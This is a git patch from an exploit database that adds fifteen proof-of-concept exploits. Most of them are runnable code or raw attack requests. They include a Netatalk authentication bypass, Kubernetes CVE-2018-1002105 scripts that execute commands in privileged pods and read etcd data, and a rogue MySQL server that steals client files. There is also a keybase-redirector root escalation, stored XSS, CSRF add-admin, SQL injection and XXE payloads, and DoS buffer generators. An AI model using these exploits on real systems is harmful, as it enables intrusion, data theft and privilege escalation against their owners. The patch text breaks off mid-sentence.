From 1b31850a46276d56a724cd47ea55403f8f9697eb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 25 Dec 2018 05:01:44 +0000 Subject: [PATCH] DB: 2018-12-25 15 changes to exploits/shellcodes Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) Google Chrome 70 - SQLite Magellan Crash (PoC) Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read Keybase keybase-redirector - '$PATH' Local Privilege Escalation Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC) Netatalk - Bypass Authentication Kubernetes - (Unauthenticated) Arbitrary Requests Kubernetes - (Authenticated) Arbitrary Requests WSTMart 2.0.8 - Cross-Site Scripting WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read PhpSpreadsheet < 1.5.0 - XML External Entity (XXE) Linux/x86 - Kill All Processes Shellcode (14 bytes) --- exploits/linux/dos/46038.py | 24 +++ exploits/linux/local/46044.md | 94 +++++++++++ exploits/multiple/dos/46042.html | 136 ++++++++++++++++ exploits/multiple/remote/46048.py | 44 +++++ exploits/multiple/remote/46052.py | 169 +++++++++++++++++++ exploits/multiple/remote/46053.py | 132 +++++++++++++++ exploits/php/webapps/46035.txt | 25 +++ exploits/php/webapps/46036.txt | 51 ++++++ exploits/php/webapps/46037.txt | 37 +++++ exploits/php/webapps/46041.py | 260 ++++++++++++++++++++++++++++++ exploits/php/webapps/46050.txt | 42 +++++ exploits/windows/dos/46002.py | 20 +-- exploits/windows/local/46040.txt | 23 +++ exploits/windows/local/46051.txt | 2 + files_exploits.csv | 13 ++ files_shellcodes.csv | 1 + shellcodes/linux/46039.c | 42 +++++ 17 files changed, 1105 insertions(+), 10 deletions(-) create mode 100755 exploits/linux/dos/46038.py create mode 100644 exploits/linux/local/46044.md create mode 100644 exploits/multiple/dos/46042.html create mode 100755 exploits/multiple/remote/46048.py create mode 100755 exploits/multiple/remote/46052.py create mode 100755 exploits/multiple/remote/46053.py create mode 100644 exploits/php/webapps/46035.txt create mode 100644 exploits/php/webapps/46036.txt create mode 100644 exploits/php/webapps/46037.txt create mode 100755 exploits/php/webapps/46041.py create mode 100644 exploits/php/webapps/46050.txt create mode 100644 exploits/windows/local/46040.txt create mode 100644 exploits/windows/local/46051.txt create mode 100644 shellcodes/linux/46039.c diff --git a/exploits/linux/dos/46038.py b/exploits/linux/dos/46038.py new file mode 100755 index 000000000..598c0a60b --- /dev/null +++ b/exploits/linux/dos/46038.py @@ -0,0 +1,24 @@ +# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) +# Discovery by: Mr Winst0n +# Discovery Date: 2018-12-22 +# Vendor Homepage: https://angryip.org/ +# Software Link : https://angryip.org/download/ +# Tested Version: 3.5.3 (latest version) +# Tested on: Kali linux +# Vulnerability Type: Denial of Service (DoS) + +# Steps to Produce the Crash: +# 1.- Run python code : python angryip.py +# 2.- Open Xangry.txt and copy content to clipboard +# 3.- Open Angry IP Scanner +# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports", +# 5.- Paste ClipBoard on "Port selection", and click on "OK", +# 6.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 384 +crash = buffer + "BBBB" + "CCCC" +f = open("Xangry.txt", "w") +f.write(crash) +f.close() \ No newline at end of file diff --git a/exploits/linux/local/46044.md b/exploits/linux/local/46044.md new file mode 100644 index 000000000..53de5c02d --- /dev/null +++ b/exploits/linux/local/46044.md @@ -0,0 +1,94 @@ +keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root. + +## Environment + +CentOS Linux release 7.4.1708 (Core) +3.10.0-693.17.1.el7.x86_64 + +RPM info + +``` +Name : keybase +Version : 2.8.0.20181017144746.3efc4cbf3c +Release : 1 +Architecture: x86_64 +Install Date: Mon 22 Oct 2018 05:30:36 PM EDT +Group : Unspecified +Size : 273302678 +License : BSD +Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7 +Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm +Build Date : Wed 17 Oct 2018 10:54:47 AM EDT +Build Host : 6ae61e160e87 +Relocations : (not relocatable) +Summary : Keybase command line client +Description : +Keybase command line client +``` + +An unprivileged user named user1 is used for this PoC. + +## Steps to reproduce + +1) Display privileges of user 1 - execute the id command + +``` +[user1@localhost woot]$ id +uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 +``` + +2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed. + +``` +cat >fusermount.c< +#include +#include +#include + +int main(int argc, char **argv) +{ + setreuid(0,0); + system("/usr/bin/touch /w00t"); + return(0); +} +EOF +`` + +3) Compile fusermount.c + +``` +gcc -Wall fusermount.c -o fusermount +``` + +4) Verify that /w00t does not exist. + +``` +[user1@localhost woot]$ ls -ld /w00t +ls: cannot access /w00t: No such file or directory +``` + +5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root. + +``` +env PATH=.:$PATH /usr/bin/keybase-redirector /keybase +``` + +6) Enter the control-c sequence to kill the application. + +``` +[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase +^C +``` + +7) Verify that /w00t exists + +``` +[user1@localhost woot]$ ls -ld /w00t +-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t +[user1@localhost woot]$ +``` + +## Impact + +Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system. \ No newline at end of file diff --git a/exploits/multiple/dos/46042.html b/exploits/multiple/dos/46042.html new file mode 100644 index 000000000..c2e7868dc --- /dev/null +++ b/exploits/multiple/dos/46042.html @@ -0,0 +1,136 @@ + + +

This proof-of-concept crashes the Chrome renderer process using Tencent Blade Team's Magellan SQLite3 bug. It's based on a SQLite test case from the commit that fixed the bug.

+ +

If you're using Chrome 70 or below, tap the button below to crash this page:

+ +

Your browser's user agent is: not available without JavaScript. Turn it on!

+ +

Source code for this page on GitHub.

+ +

Sign up for more information

+

I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:

+
+ + + +
+ +

What's supposed to happen?

+

After you press the button, the page should crash:

+

screenshot

+

On Android 5.1, I get a segfault in memcpy:

+
+        F/libc    ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
+        I/DEBUG   (  142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+        I/DEBUG   (  142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
+        I/DEBUG   (  142): Revision: '0'
+        I/DEBUG   (  142): ABI: 'arm'
+        I/DEBUG   (  142): pid: 3801, tid: 3854, name: Database thread  >>> com.android.chrome:sandboxed_process6 <<<
+        I/DEBUG   (  142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
+        I/DEBUG   (  142):     r0 e0ddb457  r1 611be0ab  r2 00000002  r3 ff000000
+        I/DEBUG   (  142):     r4 611be038  r5 00000002  r6 611be0a9  r7 7fffffff
+        I/DEBUG   (  142):     r8 00000001  r9 611be0ab  sl 80000001  fp 00000000
+        I/DEBUG   (  142):     ip 00000066  sp 6defd3a0  lr 00000074  pc 4025eb62  cpsr 680f2430
+        I/DEBUG   (  142): 
+        I/DEBUG   (  142): backtrace:
+        I/DEBUG   (  142):     #00 pc 0000fb62  /system/lib/libc.so (__memcpy_base+217)
+        I/DEBUG   (  142):     #01 pc 018d0e1d  /data/app/com.android.chrome-1/base.apk
+
+ +

What's affected?

+

Affected: tested, causes one tab/one window to crash:

+
    +
  • Chrome 70.0.3538.110 on Android 5.1 and 9
    • +
  • Electron 2.0.12 on macOS 10.14
    • +
+

Not affected:

+
    +
  • Chrome 71.0.3578.98 on Android 8.1 (already fixed)
    • +
  • Safari (doesn't have FTS enabled in SQLite3)
    • +
  • Browsers not based on Chrome (no WebSQL support)
    • +
+ + \ No newline at end of file diff --git a/exploits/multiple/remote/46048.py b/exploits/multiple/remote/46048.py new file mode 100755 index 000000000..f1c21560f --- /dev/null +++ b/exploits/multiple/remote/46048.py @@ -0,0 +1,44 @@ +import socket +import struct +import sys +if len(sys.argv) != 3: + sys.exit(0) +ip = sys.argv[1] +port = int(sys.argv[2]) +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + ip + ":" + sys.argv[2] +sock.connect((ip, port)) +dsi_payload = "\x00\x00\x40\x00" # client quantum +dsi_payload += '\x00\x00\x00\x00' # overwrites datasize +dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum +dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids +dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr +dsi_opensession = "\x01" # attention quantum option +dsi_opensession += struct.pack("B", len(dsi_payload)) # length +dsi_opensession += dsi_payload +dsi_header = "\x00" # "request" flag +dsi_header += "\x04" # open session command +dsi_header += "\x00\x01" # request id +dsi_header += "\x00\x00\x00\x00" # data offset +dsi_header += struct.pack(">I", len(dsi_opensession)) +dsi_header += "\x00\x00\x00\x00" # reserved +dsi_header += dsi_opensession +sock.sendall(dsi_header) +resp = sock.recv(1024) +print "[+] Open Session complete" +afp_command = "\x01" # invoke the second entry in the table +afp_command += "\x00" # protocol defined padding +afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry +afp_command += struct.pack("Q", 0x4295f0) # address to jump to +dsi_header = "\x00" # "request" flag +dsi_header += "\x02" # "AFP" command +dsi_header += "\x00\x02" # request id +dsi_header += "\x00\x00\x00\x00" # data offset +dsi_header += struct.pack(">I", len(afp_command)) +dsi_header += '\x00\x00\x00\x00' # reserved +dsi_header += afp_command +print "[+] Sending get server info request" +sock.sendall(dsi_header) +resp = sock.recv(1024) +print resp +print "[+] Fin." \ No newline at end of file diff --git a/exploits/multiple/remote/46052.py b/exploits/multiple/remote/46052.py new file mode 100755 index 000000000..2469c0927 --- /dev/null +++ b/exploits/multiple/remote/46052.py @@ -0,0 +1,169 @@ +#!/usr/bin/env python3 +import argparse +from ssl import wrap_socket +from json import loads, dumps +from socket import create_connection + + +def request_stage_1(base, version, target): + + stage_1 = "" + + with open('ustage_1', 'r') as stage_1_fd: + stage_1 = stage_1_fd.read() + + return stage_1.format(base, version, target + ).encode('utf-8') + + +def request_stage_2(base, version, target_api, target): + + stage_2 = "" + + with open('ustage_2', 'r') as stage_2_fd: + stage_2 = stage_2_fd.read() + + return stage_2.format(base, version, target_api, target, + ).encode('utf-8') + + +def read_data(ssock): + + data = [] + data_incoming = True + + while data_incoming: + data_in = ssock.recv(4096) + + if not data_in: + data_incoming = False + + elif data_in.find(b'\n\r\n0\r\n\r\n') != -1: + data_incoming = False + + offset_1 = data_in.find(b'{') + offset_2 = data_in.find(b'}\n') + + if offset_1 != -1 and offset_2 != -1: + data_in = data_in[offset_1-1:offset_2+1] + + elif offset_1 != -1: + data_in = data_in[offset_1-1:] + + elif offset_2 != -1: + data_in = data_in[:offset_2-1] + + data.append(data_in) + + return data + + +def run_exploit(target, stage_1, stage_2, filename, json): + + host, port = target.split(':') + + with create_connection((host, port)) as sock: + + with wrap_socket(sock) as ssock: + print('[*] Building pipe ...') + ssock.send(stage_1) + + data_in = ssock.recv(15) + + if b'HTTP/1.1 200 OK' in data_in: + print('[+] Pipe opened :D') + read_data(ssock) + + else: + print('[-] Not sure if this went well...') + + print(f"[*] Attempting to access url") + + ssock.send(stage_2) + data_in = ssock.recv(15) + + if b'HTTP/1.1 200 OK' in data_in: + print('[+] Pipe opened :D') + + data = read_data(ssock) + + return data + + +def parse_output(data, json, filename): + + if json: + j = loads(''.join(i.decode('utf-8') + for i in data)) + + data = dumps(j, indent=4) + + if filename: + mode = 'w+' + + else: + mode = 'wb+' + + if filename: + print(f"[*] Writing output to {filename} ....") + + with open(filename, mode) as fd: + if json: + fd.write(data) + + else: + for msg in data: + fd.write(msg) + + print('[+] Done!') + + else: + if json: + print(data) + + else: + print(''.join(msg.decode('unicode_escape') for msg in data)) + + +def main(): + + parser = argparse.ArgumentParser(description='Unauthenticated PoC for' + ' CVE-2018-1002105') + required = parser.add_argument_group('required arguments') + optional = parser.add_argument_group('optional arguments') + + required.add_argument('--target', '-t', dest='target', type=str, + help='API server target:port', required=True) + required.add_argument('--api-base', '-b', dest='base', type=str, + help='Target API name i.e. "servicecatalog.k8s.io"', + default="servicecatalog.k8s.io") + required.add_argument('--api-target', '-u', dest='target_api', type=str, + help='API to access i.e. "clusterservicebrokers"', + default="clusterservicebrokers") + + optional.add_argument('--api-version', '-a', dest='version', type=str, + help='API version to use i.e. "v1beta1"', + default="v1beta1") + optional.add_argument('--json', '-j', dest='json', action='store_true', + help='Print json output', default=False) + optional.add_argument('--filename', '-f', dest='filename', type=str, + help='File to save output to', default=False) + + args = parser.parse_args() + + if args.target.find(':') == -1: + print("f[-] invalid target {args.target}") + return False + + stage1 = request_stage_1(args.base, args.version, args.target) + + stage2 = request_stage_2(args.base, args.version, args.target_api, + args.target) + + output = run_exploit(args.target, stage1, stage2, args.filename, args.json) + + parse_output(output, args.json, args.filename) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/46053.py b/exploits/multiple/remote/46053.py new file mode 100755 index 000000000..3e098d337 --- /dev/null +++ b/exploits/multiple/remote/46053.py @@ -0,0 +1,132 @@ +#!/usr/bin/env python3 +import argparse +from ssl import wrap_socket +from socket import create_connection +from secrets import base64, token_bytes + + +def request_stage_1(namespace, pod, method, target, token): + + stage_1 = "" + + with open('stage_1', 'r') as stage_1_fd: + stage_1 = stage_1_fd.read() + + return stage_1.format(namespace, pod, method, target, + token).encode('utf-8') + + +def request_stage_2(target, namespace, pod, container, command): + + stage_2 = "" + + command = f"command={'&command='.join(command.split(' '))}" + + with open('stage_2', 'r') as stage_2_fd: + stage_2 = stage_2_fd.read() + + key = base64.b64encode(token_bytes(20)).decode('utf-8') + + return stage_2.format(namespace, pod, container, command, + target, key).encode('utf-8') + + +def run_exploit(target, stage_1, stage_2, method, filename, ppod, + container): + + host, port = target.split(':') + + with create_connection((host, port)) as sock: + + with wrap_socket(sock) as ssock: + print(f"[*] Building pipe using {method}...") + ssock.send(stage_1) + + if b'400 Bad Request' in ssock.recv(4096): + print('[+] Pipe opened :D') + + else: + print('[-] Not sure if this went well...') + + print(f"[*] Attempting code exec on {ppod}/{container}") + ssock.send(stage_2) + + if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096): + print('[-] Exploit failed :(') + + return False + + data_incoming = True + + data = [] + + while data_incoming: + data_in = ssock.recv(4096) + data.append(data_in) + + if not data_in: + data_incoming = False + + if filename: + print(f"[*] Writing output to {filename} ....") + + with open(filename, 'wb+') as fd: + for msg in data: + fd.write(msg) + + print('[+] Done!') + + else: + print(''.join(msg.decode('unicode-escape') + for msg in data)) + + +def main(): + + parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.') + + required = parser.add_argument_group('required arguments') + optional = parser.add_argument_group('optional arguments') + + required.add_argument('--target', '-t', dest='target', type=str, + help='API server target:port', required=True) + required.add_argument('--jwt', '-j', dest='token', type=str, + help='JWT token for service account', required=True) + required.add_argument('--namespace', '-n', dest='namespace', type=str, + help='Namespace with method access', + default='default') + required.add_argument('--pod', '-p', dest='pod', type=str, + required=True, help='Pod with method access') + required.add_argument('--method', '-m', dest='method', choices=['exec', + 'portforward', 'attach'], required=True) + + optional.add_argument('--privileged-namespace', '-s', dest='pnamespace', + help='Target namespace', default='kube-system') + optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str, + help='Target privileged pod', + default='etcd-kubernetes') + optional.add_argument('--container', '-c', dest='container', type=str, + help='Target container', default='etcd') + optional.add_argument('--command', '-x', dest='command', type=str, + help='Command to execute', + default='/bin/cat /var/lib/etcd/member/snap/db') + optional.add_argument('--filename', '-f', dest='filename', type=str, + help='File to save output to', default=False) + + args = parser.parse_args() + + if args.target.find(':') == -1: + print(f"[-] invalid target {args.target}") + return False + + stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target, + args.token) + stage2 = request_stage_2(args.target, args.pnamespace, args.ppod, + args.container, args.command) + + run_exploit(args.target, stage1, stage2, args.method, args.filename, + args.ppod, args.container) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/46035.txt b/exploits/php/webapps/46035.txt new file mode 100644 index 000000000..c69ee6b46 --- /dev/null +++ b/exploits/php/webapps/46035.txt @@ -0,0 +1,25 @@ +# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting +# Date: 2018-12-23 +# Exploit Author: linfeng +# Vendor Homepage: https://github.com/wstmall/wstmart/ +# Software Link: http://www.wstmart.net/ +# Version: WSTMart 2.0.8_181212 +# CVE: CVE-2018-20367 + +# 0x01 stored XSS (PoC) +Function point: mall some commodity details - commodity consultation +poc: +POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 +Accept: / +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 83 +Connection: close +Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454 + +goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E \ No newline at end of file diff --git a/exploits/php/webapps/46036.txt b/exploits/php/webapps/46036.txt new file mode 100644 index 000000000..065fdc3bb --- /dev/null +++ b/exploits/php/webapps/46036.txt @@ -0,0 +1,51 @@ +# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) +# Date: 2018-12-23 +# Exploit Author: linfeng +# Vendor Homepage:https://github.com/wstmall/wstmart/ +# Software Link:http://www.wstmart.net/ +# Version: WSTMart 2.0.8_181212 +# CVE :CVE-2018-19138 + +# 0x02 CSRF PoC +# 18/5000 +# Function point: background management - staff management - login account +# poc: +# 1234.html + + + + + + Document + + +
+ + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/46037.txt b/exploits/php/webapps/46037.txt new file mode 100644 index 000000000..ca2d57eb5 --- /dev/null +++ b/exploits/php/webapps/46037.txt @@ -0,0 +1,37 @@ +# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection +# Google Dork: N/A +# Date: 2018-12-22 +# Exploit Author: Sainadh Jamalpur +# Vendor Homepage: http://frontaccounting.com/ +# Software Link: https://sourceforge.net/projects/frontaccounting/ +# Version: 2.4.5 +# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64 +# CVE : N/A + +# ========================= Vendor Summery ===================== +# +# FrontAccounting (FA) is a professional web-based Accounting system for +# the entire ERP chain written in PHP, using MySQL. FA is multilingual and +# multicurrency. +# +# ======================== Vulnerability Description =============== +# +# the parameter "filterType" in /attachments.php is Vulnerable to Time +# Based Blind SQL Injection. +# +# ======================== PoC ======================================= + +POST /frontaccounting/admin/attachments.php? HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: http://localhost/frontaccounting/admin/attachments.php? +Content-Type: application/x-www-form-urlencoded +Content-Length: 367 +DNT: 1 +Connection: close +Cookie: +Upgrade-Insecure-Requests: 1 +user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx \ No newline at end of file diff --git a/exploits/php/webapps/46041.py b/exploits/php/webapps/46041.py new file mode 100755 index 000000000..20f6cfac4 --- /dev/null +++ b/exploits/php/webapps/46041.py @@ -0,0 +1,260 @@ +#!/usr/bin/env python +#coding: utf8 + + +import socket +import asyncore +import asynchat +import struct +import random +import logging +import logging.handlers + + + +PORT = 3306 + +log = logging.getLogger(__name__) + +log.setLevel(logging.DEBUG) +tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab') +tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s")) +log.addHandler( + tmp_format +) + +filelist = ( +# r'c:\boot.ini', + r'c:\windows\win.ini', +# r'c:\windows\system32\drivers\etc\hosts', +# '/etc/passwd', +# '/etc/shadow', +) + + +#================================================ +#=======No need to change after this lines======= +#================================================ + +__author__ = 'Gifts' + +def daemonize(): + import os, warnings + if os.name != 'posix': + warnings.warn('Cant create daemon on non-posix system') + return + + if os.fork(): os._exit(0) + os.setsid() + if os.fork(): os._exit(0) + os.umask(0o022) + null=os.open('/dev/null', os.O_RDWR) + for i in xrange(3): + try: + os.dup2(null, i) + except OSError as e: + if e.errno != 9: raise + os.close(null) + + +class LastPacket(Exception): + pass + + +class OutOfOrder(Exception): + pass + + +class mysql_packet(object): + packet_header = struct.Struct('> 16, 0, self.packet_num) + + result = "{0}{1}".format( + header, + self.payload + ) + return result + + def __repr__(self): + return repr(str(self)) + + @staticmethod + def parse(raw_data): + packet_num = ord(raw_data[0]) + payload = raw_data[1:] + + return mysql_packet(packet_num, payload) + + +class http_request_handler(asynchat.async_chat): + + def __init__(self, addr): + asynchat.async_chat.__init__(self, sock=addr[0]) + self.addr = addr[1] + self.ibuffer = [] + self.set_terminator(3) + self.state = 'LEN' + self.sub_state = 'Auth' + self.logined = False + self.push( + mysql_packet( + 0, + "".join(( + '\x0a', # Protocol + '3.0.0-Evil_Mysql_Server' + '\0', # Version + #'5.1.66-0+squeeze1' + '\0', + '\x36\x00\x00\x00', # Thread ID + 'evilsalt' + '\0', # Salt + '\xdf\xf7', # Capabilities + '\x08', # Collation + '\x02\x00', # Server Status + '\0' * 13, # Unknown + 'evil2222' + '\0', + )) + ) + ) + + self.order = 1 + self.states = ['LOGIN', 'CAPS', 'ANY'] + + def push(self, data): + log.debug('Pushed: %r', data) + data = str(data) + asynchat.async_chat.push(self, data) + + def collect_incoming_data(self, data): + log.debug('Data recved: %r', data) + self.ibuffer.append(data) + + def found_terminator(self): + data = "".join(self.ibuffer) + self.ibuffer = [] + + if self.state == 'LEN': + len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1 + if len_bytes < 65536: + self.set_terminator(len_bytes) + self.state = 'Data' + else: + self.state = 'MoreLength' + elif self.state == 'MoreLength': + if data[0] != '\0': + self.push(None) + self.close_when_done() + else: + self.state = 'Data' + elif self.state == 'Data': + packet = mysql_packet.parse(data) + try: + if self.order != packet.packet_num: + raise OutOfOrder() + else: + # Fix ? + self.order = packet.packet_num + 2 + if packet.packet_num == 0: + if packet.payload[0] == '\x03': + log.info('Query') + + filename = random.choice(filelist) + PACKET = mysql_packet( + packet, + '\xFB{0}'.format(filename) + ) + self.set_terminator(3) + self.state = 'LEN' + self.sub_state = 'File' + self.push(PACKET) + elif packet.payload[0] == '\x1b': + log.info('SelectDB') + self.push(mysql_packet( + packet, + '\xfe\x00\x00\x02\x00' + )) + raise LastPacket() + elif packet.payload[0] in '\x02': + self.push(mysql_packet( + packet, '\0\0\0\x02\0\0\0' + )) + raise LastPacket() + elif packet.payload == '\x00\x01': + self.push(None) + self.close_when_done() + else: + raise ValueError() + else: + if self.sub_state == 'File': + log.info('-- result') + log.info('Result: %r', data) + + if len(data) == 1: + self.push( + mysql_packet(packet, '\0\0\0\x02\0\0\0') + ) + raise LastPacket() + else: + self.set_terminator(3) + self.state = 'LEN' + self.order = packet.packet_num + 1 + + elif self.sub_state == 'Auth': + self.push(mysql_packet( + packet, '\0\0\0\x02\0\0\0' + )) + raise LastPacket() + else: + log.info('-- else') + raise ValueError('Unknown packet') + except LastPacket: + log.info('Last packet') + self.state = 'LEN' + self.sub_state = None + self.order = 0 + self.set_terminator(3) + except OutOfOrder: + log.warning('Out of order') + self.push(None) + self.close_when_done() + else: + log.error('Unknown state') + self.push('None') + self.close_when_done() + + +class mysql_listener(asyncore.dispatcher): + def __init__(self, sock=None): + asyncore.dispatcher.__init__(self, sock) + + if not sock: + self.create_socket(socket.AF_INET, socket.SOCK_STREAM) + self.set_reuse_addr() + try: + self.bind(('', PORT)) + except socket.error: + exit() + + self.listen(5) + + def handle_accept(self): + pair = self.accept() + + if pair is not None: + log.info('Conn from: %r', pair[1]) + tmp = http_request_handler(pair) + + +z = mysql_listener() +daemonize() +asyncore.loop() \ No newline at end of file diff --git a/exploits/php/webapps/46050.txt b/exploits/php/webapps/46050.txt new file mode 100644 index 000000000..259a54a2b --- /dev/null +++ b/exploits/php/webapps/46050.txt @@ -0,0 +1,42 @@ +# Product Description +PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc. + +# Vulnerabilities List +One vulnerability was identified within the PhpSpreadsheet library. + +# Affected Version +Versions <=1.5.0 + +# Solution +Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan. + +This vulnerability is described in the following section. + +# XML External Entity (XXE) Injection +The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem. + +# Vulnerability Details +CVE ID: CVE-2018-19277 + +Access Vector: Network + +Security Risk: High + +Vulnerability: CWE-611 + +CVSS Base Score: 7.7 + +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + +The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload: + + +``` + + +%aaa;%ccc;%ddd;]> +``` + +The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped. + +When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed. \ No newline at end of file diff --git a/exploits/windows/dos/46002.py b/exploits/windows/dos/46002.py index 4757cb322..0e4a2f844 100755 --- a/exploits/windows/dos/46002.py +++ b/exploits/windows/dos/46002.py @@ -1,13 +1,13 @@ # Exploit Title: AnyBurn -# Date: 15-12-2018=20 +# Date: 15-12-2018 # Vendor Homepage: http://www.anyburn.com/ # Software Link : http://www.anyburn.com/anyburn_setup.exe # Exploit Author: Achilles # Tested Version: 4.3 (32-bit) # Tested on: Windows 7 x64 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow -=20 -# Steps to Produce the Crash:=20 + +# Steps to Produce the Crash: # 1.- Run python code : AnyBurn.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open AnyBurn choose 'Copy disk to Image' @@ -16,13 +16,13 @@ #!/usr/bin/env python -buffer =3D "\x41" * 10000 +buffer = "\x41" * 10000 try: -=09f=3Dopen("Evil.txt","w") -=09print "[+] Creating %s bytes evil payload.." %len(buffer) -=09f.write(buffer) -=09f.close() -=09print "[+] File created!" + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" except: -=09print "File cannot be created" \ No newline at end of file + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46040.txt b/exploits/windows/local/46040.txt new file mode 100644 index 000000000..e505c00b7 --- /dev/null +++ b/exploits/windows/local/46040.txt @@ -0,0 +1,23 @@ +The bug is in “MsiAdvertiseProduct” + +Calling this function will result in a file copy by the installer service. + +This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability. + +To reproduce: + +Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory. + +Usage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”) + +Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o + +The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account. + +Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal. + +If shadow 